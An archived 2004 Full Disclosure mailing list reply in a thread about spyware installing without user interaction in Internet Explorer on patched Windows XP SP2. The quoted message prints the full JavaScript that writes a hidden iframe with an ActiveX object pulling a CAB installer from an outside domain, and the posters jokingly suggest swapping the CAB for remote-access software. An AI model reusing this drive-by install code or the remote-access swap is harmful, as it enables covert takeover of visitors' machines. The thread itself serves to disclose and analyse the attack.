Full Disclosure mailing list archives
Re: Spyware installs with no interaction in IE on fully patched XP SP2 box
From: GuidoZ <uberguidoz () gmail com>
Date: Mon, 4 Oct 2004 23:33:11 -0700
If you want a laugh, replace the CAB files which WinVNC or somesuch.
Intriguing indeed. However, you'll want to make a CAB file out of it, not just an EXE. The CLSID and install params are for CABs. Not to difficult to do though with a little Google hunting and some time. =) -- Peace ~G On Mon, 4 Oct 2004 10:15:46 -0500 (CDT), Gossi The Dog <gossi () abate veritynet net> wrote:
Yes... ThemeXP.org has this in the HTML.. <!-- AUTO_PROMPT AD START --><script language="JavaScript" type="text/JavaScript " src="http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js"></script> <!-- AUTO_PROMPT AD END --> Which calls... http://WWW.addictivetechnologies.net/dm0/js/Confirm80wu03rd.js Which contains... document.write('<iframe id="downloads_manager" style="position:a bsolute;visibility:hidden;"></iframe>'); document_code = '<html><head>\n'; document_code += '<\/head><body>\n'; document_code += '<object onerror="window.parent.retry();" id="DDo wnload_UL1" classid="clsid:00000EF1-0786-4633-87C6-1AA7A44296DA" codebase="http: //www.addictivetechnologies.net/DM0/cab/ATPartners.cab" HEIGHT=0 WIDTH=0><PARAM NAME="AffiliateID" VALUE="%2BA0%2CJ%7Dh%3AB6%5E%3B9gy%3E7ue%2D%7Dhx"></object>\n '; document_code += '<\/body><\/html>'; downloads_manager.document.write(document_code); downloads_manager.document.close(); setCookie('minpopup80wu03rd','test',1); ...which downloads http: //www.addictivetechnologies.net/DM0/cab/ATPartners.cab ...which means those using shitty MS browsers get owned, again. If you want a laugh, replace the CAB files which WinVNC or somesuch. --g _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- RE: Spyware installs with no interaction in IE on fully patched XP SP2 box, (continued)
- RE: Spyware installs with no interaction in IE on fully patched XP SP2 box Michael Simpson (Oct 04)
- Re: Spyware installs with no interaction in IE on fully patched XP SP2 box Alla Bezroutchko (Oct 05)
- RE: Spyware installs with no interaction in IE on fully patched XP SP2 box Todd Towles (Oct 04)
- RE: Spyware installs with no interaction in IE on fully patched XP SP2 box Todd Towles (Oct 04)
- Re: Spyware installs with no interaction in IE on fully patched XP SP2 box Willem Koenings (Oct 04)
- RE: Re: Spyware installs with no interaction in IE on fully patched XP SP2 box Todd Towles (Oct 04)
- RE: Spyware installs with no interaction in IE on fully patched XP SP2 box Gossi The Dog (Oct 04)
- Re: Spyware installs with no interaction in IE on fully patched XP SP2 box GuidoZ (Oct 05)
- Re: Spyware installs with no interaction in IE on fully patched XP SP2 box GuidoZ (Oct 05)
- RE: Spyware installs with no interaction in IE on fully patched XP SP2 box Castigliola, Angelo (Oct 05)